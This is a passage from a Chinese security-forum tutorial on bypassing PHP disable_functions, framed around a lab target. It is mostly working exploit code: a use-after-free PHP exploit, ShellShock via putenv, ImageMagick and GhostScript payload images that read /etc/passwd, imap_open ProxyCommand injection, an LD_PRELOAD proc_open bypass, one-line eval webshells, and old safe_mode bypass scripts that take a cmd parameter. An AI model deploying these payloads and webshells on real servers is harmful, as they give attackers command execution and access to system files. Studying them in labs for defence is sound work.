  138.     i2s($a, 0x00, $closure_object);
  139.     i2s($a, 0x08, 0x108, 7);
  140.     echo "[+]Executing command: \n";
  141.     ($s -> current())("tac /flag");        // 可替换成需要执行的命令
  142. }

  144. function canRead($maps, &$a) {
  145.     global $s;
  146.     if (!$chunkAddress = getPHPChunk($maps)) {
  147.         die("[!]Get PHP Chunk Address Failed");
  148.     }
  149.     i2s($a, 0x08, 0x06, 7);
  150.     if (!$elementAddress = getElement($a, $chunkAddress)) {
  151.         die("[!]Get SplDoublyLinkedList Element Address Failed");
  152.     }
  153.     bypass($elementAddress, $a);
  154. }

  156. function cantRead(&$a) {
  157.     global $s;
  158.     i2s($a, 0x08, 0x06, 7);
  159.     if (!isset($_GET["test1"]) && !isset($_GET["test2"])) {
  160.         die("[!]Please try to get address of PHP Chunk");
  161.     }
  162.     if (isset($_GET["test1"])) {
  163.         die(dechex(bomb1($a)));
  164.     }
  165.     if (isset($_GET["test2"])) {
  166.         $elementAddress = bomb2($a);
  167.     }
  168.     if (!$elementAddress) {
  169.         die("[!]Get SplDoublyLinkedList Element Address Failed");
  170.     }
  171.     bypass($elementAddress, $a);
  172. }

  174. $s = new SplDoublyLinkedList();
  175. $s -> push(new Trigger());
  176. $s -> push("Twings");
  177. $s -> push(function($x){});
  178. for ($x = 0;$x < 0x100;$x++) {
  179.     $s -> push(0x1234567812345678);
  180. }
  181. $s -> rewind();
  182. unset($s[0]);
复制代码
直接访问即可执行命令。
利用 ShellShock 漏洞 (CVE-2014-6271)
漏洞简介
目前的bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。
攻击者只需将恶意代码写入到环境变量中,传到服务端,触发服务器运行bash脚本即可执行恶意代码。
[size=1em]有关ShellShock漏洞(Bash破壳漏洞)的详细原理可以参考以下文章:
[size=1em]https://zhuanlan.zhihu.com/p/35579956
漏洞利用条件
•putenv可用•mail or error_log 可用,本例中禁用了 mail 但未禁用 error_log•/bin/bash 存在 CVE-2014-6271 漏洞•/bin/sh -> /bin/bash sh 默认的 shell 是 bash
存在shellshock漏洞的操作系统版本
靶场环境
靶场环境的Bash版本
靶场突破
连接到webshell后,写入EXP:
  1. <?php
  2. putenv("PHP_flag=() { :; }; tac /flag > /var/www/html/flag.txt");    # 设置环境变量,将flag输入到flag.txt中
  3. error_log("a",1);
复制代码
访问EXP,刷新后得到flag:

利用 ImageMagick RCE 漏洞 (CVE-2016-3714)
漏洞简介
ImageMagick是一款使用量很广的图片处理程序,支持 PHP、Ruby、NodeJS 和 Python 等多种语言,使用非常广泛。很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。
ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行的。首先在delegate.xml文件中,定义了很多占位符,比如%i是输入的文件名,%l是图片exif label信息,而在之后的command中,部分占位符被拼接在其中,被拼接完的command命令行传入了系统的system函数,导致任意命令执行。
[size=1em]关于该漏洞的原理详解推荐参考P神的这篇文章:
[size=1em]https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html
漏洞利用条件
•目标主机安装了漏洞版本的ImageMagick(<= 6.9.3-9)•安装了php-imagick扩展,并且在php.ini中启用•php >=5.4
[size=1em]关于这个漏洞影响ImageMagick 6.9.3-9以前是所有版本,包括ubuntu源中安装的ImageMagick。而官方在6.9.3-9版本中对漏洞进行了不完全的修复。所以,我们不能仅通过更新ImageMagick的版本来杜绝这个漏洞。
靶场环境
使用直接使用docker拉取靶场镜像:
  1. docker pull medicean/vulapps:i_imagemagick_1

  3. docker run -d -p 18081:80 --name=i_imagemagick_1 medicean/vulapps:i_imagemagick_1
复制代码
进入容器,并为靶场添加disable_functions,在php.ini中添加如下:
  1. disable_functions=pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail,system
  2. 然后重启apache服务
复制代码
之后在靶场的web根目录中写入webshell
<?php @eval($_POST['hacker']);?>
本地测试
进入容器
在容器中 /poc.png 文件内容如下:
  1. push graphic-context
  2. viewbox 0 0 640 480
  3. fill 'url(https://evalbug.com/"|ls -la")'
  4. pop graphic-context
复制代码
构建时已经集成在容器中,可手动修改第 3 行的命令。
执行下面命令验证漏洞:
  1. $ convert /poc.png 1.png
复制代码
如果看到 ls -al 命令成功执行,则存在漏洞。
同时除了.mvg格式的图片外,普通png的图片也能触发这个命令执行。
这是delete对%l,也就是exif label的处理:
  1. <delegate decode="miff" encode="show" spawn="True" command=""/usr/bin/display" -delay 0 -window-group %[group] -title "%l " "ephemeral:%i""/>
复制代码
将%l拼接到了/usr/bin/display命令中,所以现在就只需要将一个普通的png图片加上恶意的exif信息,然后在满足条件的情况下触发即可。


[size=1em]由于delegate.xml中设置了encode为show或者win,所以需要输出为.show或者.win的情况下才会调用该delegate(换句话说,也就是普通的文件处理不会触发这个命令)
靶场突破
编写一个恶意的png文件:
  1. push graphic-context
  2. viewbox 0 0 640 480
  3. fill 'url(https://evalbug.com/"|cat /etc/passwd > t.txt")'
  4. pop graphic-context
复制代码
再对其进行base64编码

使用蚁剑连接WebShell,并上传如下EXP:
  1. <?php
  2. function readImageBlob() {
  3.     $base64 = "cHVzaCBncmFwaGljLWNvbnRleHQKdmlld2JveCAwIDAgNjQwIDQ4MApmaWxsICd1cmwoaHR0cHM6
  4. Ly9ldmFsYnVnLmNvbS8ifGNhdCAvZXRjL3Bhc3N3ZCA+IHQudHh0IiknCnBvcCBncmFwaGljLWNv
  5. bnRleHQK";
  6.     $imageBlob = base64_decode($base64);
  7.     $imagick = new Imagick();
  8.     $imagick->readImageBlob($imageBlob);

  10.     header("Content-Type: image/png");
  11.     echo $imageBlob;
  12. }
  13. readImageBlob();
  14. ?>
复制代码
直接访问EXP即可执行命令
利用 GhostScript 沙箱绕过 RCE 漏洞
漏洞简介
GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。
CVE-2018-16509:8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞:
CVE-2018-19475:2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
CVE-2019-6116:2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。该漏洞可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。
漏洞利用条件
•GhostScript 版本 < 9.26
靶场环境
靶场突破
构造payload:exp.png
  1. %!PS
  2. % extract .actual_pdfpaintproc operator from pdfdict
  3. /.actual_pdfpaintproc pdfdict /.actual_pdfpaintproc get def

  5. /exploit {
  6.     (Stage 11: Exploitation...)=

  8.     /forceput exch def

  10.     systemdict /SAFER false forceput
  11.     userparams /LockFilePermissions false forceput
  12.     systemdict /userparams get /PermitFileControl [(*)] forceput
  13.     systemdict /userparams get /PermitFileWriting [(*)] forceput
  14.     systemdict /userparams get /PermitFileReading [(*)] forceput

  16.     % update
  17.     save restore

  19.     % All done.
  20.     stop
  21. } def

  23. errordict /typecheck {
  24.     /typecount typecount 1 add def
  25.     (Stage 10: /typecheck #)=only typecount ==

  27.     % The first error will be the .knownget, which we handle and setup the
  28.     % stack. The second error will be the ifelse (missing boolean), and then we
  29.     % dump the operands.
  30.     typecount 1 eq { null } if
  31.     typecount 2 eq { pop 7 get exploit } if
  32.     typecount 3 eq { (unexpected)= quit }  if
  33. } put

  35. % The pseudo-operator .actual_pdfpaintproc from pdf_draw.ps pushes some
  36. % executable arrays onto the operand stack that contain .forceput, but are not
  37. % marked as executeonly or pseudo-operators.
  38. %
  39. % The routine was attempting to pass them to ifelse, but we can cause that to
  40. % fail because when the routine was declared, it used `bind` but many of the
  41. % names it uses are not operators and so are just looked up in the dictstack.
  42. %
  43. % This means we can push a dict onto the dictstack and control how the routine
  44. % works.
  45. <<
  46.     /typecount      0
  47.     /PDFfile        { (Stage 0: PDFfile)= currentfile }
  48.     /q              { (Stage 1: q)= } % no-op
  49.     /oget           { (Stage 3: oget)= pop pop 0 } % clear stack
  50.     /pdfemptycount  { (Stage 4: pdfemptycount)= } % no-op
  51.     /gput           { (Stage 5: gput)= }  % no-op
  52.     /resolvestream  { (Stage 6: resolvestream)= } % no-op
  53.     /pdfopdict      { (Stage 7: pdfopdict)= } % no-op
  54.     /.pdfruncontext { (Stage 8: .pdfruncontext)= 0 1 mark } % satisfy counttomark and index
  55.     /pdfdict        { (Stage 9: pdfdict)=
  56.         % cause a /typecheck error we handle above
  57.         true
  58.     }
  59. >> begin <<>> <<>> { .actual_pdfpaintproc } stopped pop

  61. (Should now have complete control over ghostscript, attempting to read /etc/passwd...)=

  63. % Demonstrate reading a file we shouldnt have access to.
  64. (/etc/passwd) (r) file dup 64 string readline pop == closefile

  66. (Attempting to execute a shell command...)= flush

  68. % run command
  69. (%pipe%cat /etc/passwd > /var/www/html/res.txt) (w) file closefile

  71. (All done.)=

  73. quit
复制代码
作者给出了POC,上传这个文件,即可执行cat /etc/passwd > /var/www/html/res.txt
利用 PHP imap_open RCE 漏洞 (CVE-2018-19518)
漏洞简介
PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接,则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。成功的攻击可能允许攻击者绕过其他禁用的exec 受影响软件中的功能,攻击者可利用这些功能在目标系统上执行任意shell命令。
漏洞利用条件
[size=1em]这个漏洞出现在较老的PHP版本中,PHP官方针对7.1.x在7.1.25版本发布时修复了 CVE-2018-19518 漏洞。
靶场环境
进入靶场并在Web目录中写入WebShell:
  1. <?php @eval($_POST['hacker']); ?>
复制代码
该漏洞执行的结果是无回显的,为了保存查看执行后的命令回显的数据,这里将Web目录的所属改为www-data
chown -R www-data:www-data /var/www/html
[size=1em]具体的环境配置与漏洞复现过程可以参考FreeBuf的这篇文章:
[size=1em]https://www.freebuf.com/vuls/192712.html
靶场突破
payload:
  1. <?php
  2. $payload = "cat /etc/passwd >/var/www/html/res.txt";
  3. $base64 = base64_encode($payload);
  4. $server = "x -oProxyCommand=echo\t{$base64}|base64\t-d|sh";
  5. @imap_open('{'.$server.'}:143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
复制代码
将payload代码部分进行URL编码:
  1. $payload%20=%20%22cat%20/etc/passwd%20%3E/var/www/html/res.txt%22;%0A$base64%20=%20base64_encode($payload);%0A$server%20=%20%22x%20-oProxyCommand=echo%5Ct%7B$base64%7D%7Cbase64%5Ct-d%7Csh%22;%0A@imap_open('%7B'.$server.'%7D:143/imap%7DINBOX',%20'',%20'')%20or%20die(%22%5Cn%5CnError:%20%22.imap_last_error());
  2. 在WebShell中提交即可执行命令。
复制代码
利用Nginx+PHP-fpm RCE 漏洞 (CVE-2019-11043)
漏洞简介
2019年10月23日,github公开漏洞相关的详情以及exp。当nginx配置不当时,会导致php-fpm远程任意代码执行。
攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp。Regexp被损坏导致PATH_INFO为空,同时slen可控,从而触发该漏洞。
漏洞利用条件
•Linux系统•Nginx + PHP-FPM•PHP 版本•PHP 7.0.X•PHP 7.1.X < 7.1.33•PHP 7.2.X < 7.2.24•PHP 7.3.X < 7.3.11•Nginx特定配置(如下)
  1. location ~ [^/]\.php(/|$) {
  2. ...
  3. fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  4. fastcgi_param PATH_INFO $fastcgi_path_info;
  5. fastcgi_pass   php:9000;
  6. ...
  7. }
复制代码
靶场环境
靶场突破
下载github上公开的exp(需要go环境)。
go get github.com/neex/phuip-fpizdam
然后编译
go install github.com/neex/phuip-fpizdam
使用exp攻击靶场网站
./phuip-fpizdam http://192.168.43.187:8080/index.php
攻击成功,可以直接执行命令。

其它绕过方法
以下方法由于很多都是针对旧版本的PHP,有些需要加载特殊的第三方扩展,就不具体讲解了,有兴趣的小伙伴可以自己去复现。
PHP5 pcntl_exec()
  1. <?php
  2. $dir = '/var/tmp/';
  3. $cmd = 'ls';
  4. $option = '-l';
  5. $pathtobin = '/bin/bash';

  7. $arg = array($cmd, $option, $dir);

  9. pcntl_exec($pathtobin, $arg);
  10. echo '123';
  11. ?>
  12. <?php
  13. $cmd = @$_REQUEST[cmd];
  14. if(function_exists('pcntl_exec')) {
  15.     $cmd = $cmd."&pkill -9 bash >out";
  16.     pcntl_exec("/bin/bash", $cmd);
  17.     echo file_get_contents("out");        
  18. } else {
  19.         echo '不支持pcntl扩展';
  20. }
  21. ?>
复制代码
PHP proc_open()
a.c:
  1. #include <stdlib.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. int getuid()
  5. {
  6. char *en;
  7. char *buf=malloc(300);
  8. FILE *a;

  10. unsetenv("LD_PRELOAD");
  11. a=fopen(".comm","r");
  12. buf=fgets(buf,100,a);
  13. write(2,buf,strlen(buf));
  14. fclose(a);
  15. rename("a.so","b.so");
  16. system(buf);
  17. system("mv output.txt .comm1");
  18. rename("b.so","a.so");
  19. free(buf);
  20. return 0;
  21. }
复制代码
evil.php:
  1. <?php

  3. $path="/var/www"; //change to your writable path


  6. $a=fopen($path."/.comm","w");
  7. fputs($a,$_GET["c"]);
  8. fclose($a);

  10. $descriptorspec = array(
  11. 0 => array("pipe", "r"),
  12. 1 => array("file", $path."/output.txt","w"),
  13. 2 => array("file", $path."/errors.txt", "a" )
  14. );

  16. $cwd = '.';
  17. $env = array('LD_PRELOAD' => $path."/a.so");
  18. $process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed


  21. sleep(1);
  22. $a=fopen($path."/.comm1","r");

  24. echo "<pre><b>";
  25. while (!feof($a))
  26. {$b=fgets($a);echo $b;}
  27. fclose($a);
  28. echo "</pre>";

  30. ?>
  31. PHP 5.2.3 win32std Extension
  32. <?php
  33. //PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

  35. //author: shinnai
  36. //mail: shinnai[at]autistici[dot]org
  37. //site: http://shinnai.altervista.org

  39. //Tested on xp Pro sp2 full patched, worked both from the cli and on apache

  41. //Thanks to rgod for all his precious advises :)

  43. //I set php.ini in this way:
  44. //safe_mode = On
  45. //disable_functions = system
  46. //if you launch the exploit from the cli, cmd.exe will be wxecuted
  47. //if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager

  49. if (!extension_loaded("win32std")) die("win32std extension required!");
  50. system("cmd.exe"); //just to be sure that protections work well
  51. win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
  52. ?>
复制代码
PHP Perl Extension
  1. <?php

  3. ##########################################################
  4. ###----------------------------------------------------###
  5. ###----PHP Perl Extension Safe_mode Bypass Exploit-----###
  6. ###----------------------------------------------------###
  7. ###-Author:--NetJackal---------------------------------###
  8. ###-Email:---nima_501[at]yahoo[dot]com-----------------###
  9. ###-Website:-http://netjackal.by.ru--------------------###
  10. ###----------------------------------------------------###
  11. ##########################################################

  13. if(!extension_loaded('perl'))die('perl extension is not loaded');
  14. if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
  15. if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
  16. $perl=new perl();
  17. echo "<textarea rows='25' cols='75'>";
  18. $perl->eval("system('".$_GET['cmd']."')");
  19. echo "</textarea>";
  20. $_GET['cmd']=htmlspecialchars($_GET['cmd']);
  21. echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>"

  23. ?>
复制代码
PHP 5.2.4 ionCube extension
  1. <?php
  2. //PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass

  4. //author: shinnai
  5. //mail: shinnai[at]autistici[dot]org
  6. //site: http://shinnai.altervista.org

  8. //Tested on xp Pro sp2 full patched, worked both from the cli and on apache

  10. //Technical details:
  11. //ionCube version: 6.5
  12. //extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
  13. //url: www.ioncube.com

  15. //php.ini settings:
  16. //safe_mode = On
  17. //disable_functions = ioncube_read_file, readfile

  19. //Description:
  20. //This is useful to obtain juicy informations but also to retrieve source
  21. //code of php pages, password files, etc... you just need to change file path.
  22. //Anyway, don't worry, nobody will read your obfuscated code :)

  24. //greetz to: BlackLight for help me to understand better PHP

  26. //P.S.
  27. //This extension contains even an interesting ioncube_write_file function...
  28. if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
  29. $path = str_repeat("..\", 20);
  30. $MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :)
  31. $MyBoot_ioncube = ioncube_read_file($path."boot.ini");
  32. echo $MyBoot_readfile;
  33. echo "<br><br>ionCube output:<br><br>";
  34. echo $MyBoot_ioncube;
  35. ?>
复制代码
PHP <=5.2.9 (Windows x86) Safe_mode Bypass Vulnerability
  1. <?php
  2. //cmd.php
  3. /*
  4.     Abysssec Inc Public Advisory
  5.    
  6.     Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
  7.     the problem comes from OS behavior - implement  and interfacing between php
  8.     and operation systems directory structure . the problem is php won't tell difference
  9.     between directory browsing in linux and windows this can lead attacker to ability
  10.     execute his / her commands on targert machie even in SafeMod On  (php.ini setting) .
  11.     =============================================================================
  12.     in linux when you want open a directory for example php directory you need
  13.     to go to /usr/bin/php and you can't use \usr\bin\php . but windows won't tell
  14.     diffence between slash and back slash it means there is no didffrence  between
  15.     c:\php and c:/php , and this is not vulnerability but itself but  because of this  simple
  16.     php implement "" character can escape safemode using  function like excec .
  17.     here is a PoC for discussed vulnerability . just upload files on your target host and execute
  18.     your commands .
  19.     ==============================================================================
  20.     note : this vulnerabities is just for educational purpose and author will be not be responsible  
  21.     for any damage using this vulnerabilty.
  22.     ==============================================================================
  23.     for more information visit Abysssec.com
  24.     feel free to contact me at admin [at] abysssec.com
  25. */
  26.     $cmd = $_REQUEST['cmd'];
  27.     if ($cmd){
  28.     $batch = fopen ("cmd.bat","w");
  29.     fwrite($batch,"$cmd>abysssec.txt"."\r\n");
  30.     fwrite($batch,"exit");
  31.     fclose($batch);
  32.     exec("\start cmd.bat");
  33.     echo "<center>";
  34.     echo "<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";
  35.     echo "<textarea rows=20 cols=60>";
  36.     require("abysssec.txt");
  37.     echo "</textarea>";
  38.     echo "</center>";
  39.     }
  40. ?>

  42. <html>
  43. <body bgcolor=#000000 and text=#DO0000>
  44. <center>
  45. <form method=post>
  46. <input type=text name=cmd >
  47. <input type=submit value=bypass>
  48. </form>
  49. </center>
  50. </body>
  51. </html>
复制代码
PHP 5.2 FOpen Safe_mode Restriction Bypass Vulnerability
  1. source: https://www.securityfocus.com/bid/22261/info

  3. PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write files in unauthorized locations; other attacks may also be possible.

  5. This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, all assuming that the 'safe_mode' restriction will isolate users from each other.

  7. This issue is reported to affect PHP version 5.2.0; other versions may also be vulnerable.

  9. php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'
复制代码
PHP 5.2.4 and 5.2.5 PHP cURL Safe_mode Bypass Vulnerability
  1. source: http://www.securityfocus.com/bid/27413/info

  3. PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

  5. Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

  7. The issue affects PHP 5.2.5 and 5.2.4.

  9. var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
复制代码

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 19:30 , Processed in 0.019428 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表